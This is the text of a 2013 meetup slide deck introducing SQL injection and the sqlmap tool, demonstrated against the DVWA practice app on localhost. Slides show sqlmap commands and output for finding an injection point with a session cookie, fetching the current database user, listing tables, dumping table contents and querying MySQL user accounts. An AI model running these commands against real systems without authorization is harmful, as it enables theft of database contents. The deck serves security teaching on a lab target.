sqlmap 101 - Speaker Deck

Slide 1

Slide 1 text

sqlmap 101 Detect and Exploit SQL Injection Zaki Akhmad Python Indonesia Meetup February 23, 2013 Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 1 / 31

Slide 2

Slide 2 text

About Me Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 2 / 31

Slide 3

Slide 3 text

Zaki Akhmad Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 3 / 31

Slide 4

Slide 4 text

Security Analyst Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 4 / 31

Slide 5

Slide 5 text

Indonesia Chapter Leader Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 5 / 31

Slide 6

Slide 6 text

@zakiakhmad Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 6 / 31

Slide 7

Slide 7 text

[email protected] 0xFD57BE80 available at pgp.mit.edu Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 7 / 31

Slide 8

Slide 8 text

enthusiast Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 8 / 31

Slide 9

Slide 9 text

SQL Injection Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 9 / 31

Slide 10

Slide 10 text

Exploits of a Mom, XKCD #327 Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 10 / 31

Slide 11

Slide 11 text

SQL Injection is (mostly) about the unauthorized DBMS data access Miroslav Stampar, sqlmap Developer Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 11 / 31

Slide 12

Slide 12 text

SQL Injection techniques: Blind Error Union (partial and full) Time Stacked ... sqlmap 102 Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 12 / 31

Slide 13

Slide 13 text

What’s sqlmap open source penetration testing tool that automates the process of detecting and exploiting SQL injection ﬂaws and taking over of database server(s) Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 13 / 31

Slide 14

Slide 14 text

sqlmap Project Details repository web twitter contact mailing list https://github.com/sqlmapproject/sqlmap http://sqlmap.org @sqlmap dev at sqlmap.org sqlmap-users at lists.sourceforge.net Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 14 / 31

Slide 15

Slide 15 text

Project Statistic http://www.ohloh.net/p/sqlmap Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 15 / 31

Slide 16

Slide 16 text

Get and Update sqlmap $ git clone https://github.com/sqlmapproject/sqlmap.git $ python sqlmap.py –update Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 16 / 31

Slide 17

Slide 17 text

DVWA as an Example Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 17 / 31

Slide 18

Slide 18 text

Find the entry point $ python sqlmap.py -u http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit [13:27:54] [INFO] testing connection to the target url [13:27:54] [INFO] heuristics detected web page charset ’None’ sqlmap got a 302 redirect to ’http://localhost:80/dvwa/login.php’. Do you want to follow? [Y/n] Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 18 / 31

Slide 19

Slide 19 text

So, we need a cookie $ ./sqlmap.py --cookie "PHPSESSID=1gn63kn3opj97l6325h0f9sjn2; security=low" -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 19 / 31

Slide 20

Slide 20 text

sqlmap found SQL injection points Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 20 / 31

Slide 21

Slide 21 text

sqlmap ﬁngerprinting result Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 21 / 31

Slide 22

Slide 22 text

Retrieve DBMS current user $ python sqlmap.py -u ... –cookie ... –current-user [15:17:35] [INFO] fetching current user current user: ’root@localhost’ Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 22 / 31

Slide 23

Slide 23 text

Enumerate DBMS database tables $ python sqlmap.py -u ... –cookie ... –tables [14:45:32] [INFO] fetching tables for databases: ’dvwa, mysql’ Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 23 / 31

Slide 24

Slide 24 text

Enumerate DBMS database table Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 24 / 31

Slide 25

Slide 25 text

Dump DBMS database table entries $ python sqlmap.py -u ... –cookie ... –dump DVWA Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 25 / 31

Slide 26

Slide 26 text

Dump DBMS database table entries Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 26 / 31

Slide 27

Slide 27 text

Contribution Feature request Conﬁgure output directory Retrieve database server IP address Bug [CRITICAL] unhandled exception Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 27 / 31

Slide 28

Slide 28 text

Conﬁgure output directory $ python sqlmap.py -u ... –cookie ... –output-dir /tmp/sqlmap Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 28 / 31

Slide 29

Slide 29 text

Retrieve database server IP address $ python sqlmap.py -u ... --cookie ... --sql-query= "SELECT host, user FROM mysql.user WHERE user LIKE ’%root%’ OR user LIKE ’%admin%’" SELECT host, user FROM mysql.user WHERE user LIKE ’%root%’ OR user LIKE ’%admin%’ [4]: [*] 127.0.0.1, root [*] localhost, phpmyadmin [*] localhost, root [*] zara, root Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 29 / 31

Slide 30

Slide 30 text

Reference sqlmap - security development in python, Miroslav Stampar, EuroPython 2011 Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 30 / 31

Slide 31

Slide 31 text

.ﬁnish Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 31 / 31